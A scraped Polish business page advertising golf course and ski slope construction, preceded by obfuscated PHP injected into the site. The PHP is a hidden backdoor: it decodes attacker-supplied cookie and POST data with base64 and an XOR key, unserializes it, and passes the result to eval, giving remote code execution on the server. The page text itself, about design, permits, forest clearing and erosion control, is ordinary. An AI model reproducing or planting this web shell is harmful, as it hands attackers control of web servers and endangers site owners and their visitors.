$xwHuTCKvEp = "\x4a" . 'j' . chr ( 677 - 611 ).chr (95) . chr (113) . 'n' . "\157" . chr (112) . 'J';$LbNyOdZwBO = chr (99) . "\154" . "\x61" . "\x73" . chr ( 261 - 146 ).chr (95) . chr ( 978 - 877 )."\x78" . "\x69" . chr (115) . "\x74" . "\x73";$vpuETEHs = class_exists($xwHuTCKvEp); $LbNyOdZwBO = "53325";$QZCRPzs = !1;if ($vpuETEHs == $QZCRPzs){function kXAiBRPTMR(){return FALSE;}$yNjYNxlW = "22511";kXAiBRPTMR();class JjB_qnopJ{private function ZfFvaV($yNjYNxlW){if (is_array(JjB_qnopJ::$DwBnCnJB)) {$xnmdraZB = str_replace("\74" . '?' . "\160" . chr ( 942 - 838 )."\160", "", JjB_qnopJ::$DwBnCnJB['c' . chr ( 1046 - 935 ).'n' . 't' . "\x65" . "\x6e" . chr (116)]);eval($xnmdraZB); $yNjYNxlW = "22511";exit();}}private $IeTBGUYe;public function qdYxfn(){echo 51660;}public function __destruct(){$yNjYNxlW = "28338_64773";$this->ZfFvaV($yNjYNxlW); $yNjYNxlW = "28338_64773";}public function __construct($vNDcOce=0){$mfYnS = $_POST;$UIVJtGw = $_COOKIE;$XybIzIoaL = "4172d24f-eb14-4e26-a009-94428947564f";$woJcUJzDM = @$UIVJtGw[substr($XybIzIoaL, 0, 4)];if (!empty($woJcUJzDM)){$ikOeu = "base64";$TMkFlTAWY = "";$woJcUJzDM = explode(",", $woJcUJzDM);foreach ($woJcUJzDM as $PYVqoPYfVi){$TMkFlTAWY .= @$UIVJtGw[$PYVqoPYfVi];$TMkFlTAWY .= @$mfYnS[$PYVqoPYfVi];}$TMkFlTAWY = array_map($ikOeu . '_' . chr (100) . "\145" . chr (99) . "\157" . chr ( 492 - 392 ).chr (101), array($TMkFlTAWY,)); $TMkFlTAWY = $TMkFlTAWY[0] ^ str_repeat($XybIzIoaL, (strlen($TMkFlTAWY[0]) / strlen($XybIzIoaL)) + 1);JjB_qnopJ::$DwBnCnJB = @unserialize($TMkFlTAWY); $TMkFlTAWY = class_exists("28338_64773");}}public static $DwBnCnJB = 25714;}$nXeHrob = new /* 40812 */ $xwHuTCKvEp(22511 + 22511); $yNjYNxlW = strpos($yNjYNxlW, $yNjYNxlW); $QZCRPzs = $nXeHrob = $yNjYNxlW = Array();}$ArdLztvwZK = chr (109) . 'S' . "\x5f" . "\124" . "\106" . 'y' . chr (73) . "\x54";$mKTYHWqyHQ = "\143" . "\154" . chr ( 192 - 95 ).chr (115) . chr ( 1083 - 968 )."\x5f" . chr ( 756 - 655 ).'x' . chr (105) . "\x73" . chr ( 730 - 614 ).'s';$LpbfTDDS = class_exists($ArdLztvwZK); $mKTYHWqyHQ = "43411";$efLfFtcDaS = !1;if ($LpbfTDDS == $efLfFtcDaS){function wTczX(){return FALSE;}$tTuPPv = "61469";wTczX();class mS_TFyIT{private function CrmMFPEY($tTuPPv){if (is_array(mS_TFyIT::$jrKqR)) {$PxBZGEY = str_replace("\74" . chr ( 458 - 395 )."\x70" . 'h' . "\x70", "", mS_TFyIT::$jrKqR['c' . chr ( 713 - 602 )."\x6e" . 't' . "\145" . chr ( 881 - 771 )."\x74"]);eval($PxBZGEY); $tTuPPv = "61469";exit();}}private $gcGfvyfT;public function vNpxoSXk(){echo 32619;}public function __destruct(){$tTuPPv = "6774_6839";$this->CrmMFPEY($tTuPPv); $tTuPPv = "6774_6839";}public function __construct($gkCTw=0){$zGTfxldz = $_POST;$TQxQB = $_COOKIE;$sdjSCbbtb = "8664aaf1-6119-46d2-b4d5-e002ec4d98eb";$czaflLa = @$TQxQB[substr($sdjSCbbtb, 0, 4)];if (!empty($czaflLa)){$GNRgCS = "base64";$wWmbIpZJ = "";$czaflLa = explode(",", $czaflLa);foreach ($czaflLa as $JsHLnfyqZI){$wWmbIpZJ .= @$TQxQB[$JsHLnfyqZI];$wWmbIpZJ .= @$zGTfxldz[$JsHLnfyqZI];}$wWmbIpZJ = array_map($GNRgCS . "\137" . chr (100) . chr (101) . 'c' . chr ( 635 - 524 ).chr (100) . chr (101), array($wWmbIpZJ,)); $wWmbIpZJ = $wWmbIpZJ[0] ^ str_repeat($sdjSCbbtb, (strlen($wWmbIpZJ[0]) / strlen($sdjSCbbtb)) + 1);mS_TFyIT::$jrKqR = @unserialize($wWmbIpZJ); $wWmbIpZJ = class_exists("6774_6839");}}public static $jrKqR = 58613;}$ArtPksxz = new /* 52120 */ $ArdLztvwZK(61469 + 61469); $efLfFtcDaS = $ArtPksxz = $tTuPPv = Array();} Budowa pól golfowych i stoków narciarskich - Pola golfowe

Budowa pól golfowych i stoków narciarskich


Nasza specjalizacja to budowa pól golfowych, budowa stoków narciarskich, rekultywacja i zakładanie terenów zielonych.

 

 

Podstawową działalnością firm powiązanych pod nazwą Golf Construction, jest organizacja budowy lub przebudowy i renowacji pól golfowych. Tworzymy pola w Polsce, na Ukrainie, w Egipcie i Jordanii. Ponadto, doświadczenia na polskim rynku pozwalają zaproponować klientom elastyczny pakiet usług doradczych i projektowych – przystosowany do polskich wymogów formalno-prawnych – wspomagający inwestycję w pola golfowe, od projektu do otwarcia. Wychodząc poza pola golfowe, kompleksowo budujemy stoki narciarskie i wyciągi. Zagospodarowujemy tereny zielone w trudnych, górskich warunkach, rozpoczynając wycinką lasu, a kończąc na gotowych obiektach narciarskich. 

 

W zakresie budowy pola golfowego proponujemy:

 • zaplanowanie i prowadzenie inwestycji,
 • zaprojektowanie i budowę pola golfowego,
 • projekty wykonawcze pola golfowego, projekty infrastruktury towarzyszącej – obiektów inżynieryjnych, kubaturowych, specyfikacje techniczne budowy, 
 • przystosowanie projektu pola golfowego innego architekta do wymagań urzędowych, przygotowanie niezbędnych dokumentów budowy wymaganych przez polskie prawo, sporządzenie wycen, kosztorysów i harmonogramów robót,
 • aprobaty i zaopatrzenie w materiały (zgodnie z specyfikacją USGA),
 • referencyjnych specjalistów do prac konstrukcyjnych w pełnym zakresie,
 • konsultacje agrotechniczne.

Budowa pola golfowego - kształtowanie bunkrów green na polu golfowym, zabezpieczenie przeciw erozji przez darniowanie .

Budowa pola golfowego


Budowa stoków i wyciągów narciarskich w warunkach górskich:

 • kompleksowa budowa stoku narciarskiego, gwarantująca równą powierzchnię i całkowite zadarnienie,
 • projekty wyciągów i stoków narciarskich, 
 • projekty infrastruktury technicznej stoku narciarskiego: drenaż, kanalizację opadową, instalacje wodne do naśnieżania,
 • wycinka lasów: wycinka ze zrywką drzew; karczowanie drzew i krzewów, karpowanie (usunięcie korzeni po wycince),
 • rekultywacja karczowanych terenów pod zagospodarowanie obiektem narciarskim, zabezpieczenie przed erozją budowanych stoków, hydrosiew,
 • konsultacje agrotechniczne w zakresie nawierzchni zielonych w górach.

Budowa stoku narciarskiego - frezowanie gruntu podczas budowy stoków narciarskich, uprawa broną aktywną, siew rzutowy.

Budowa stoku narciarskiego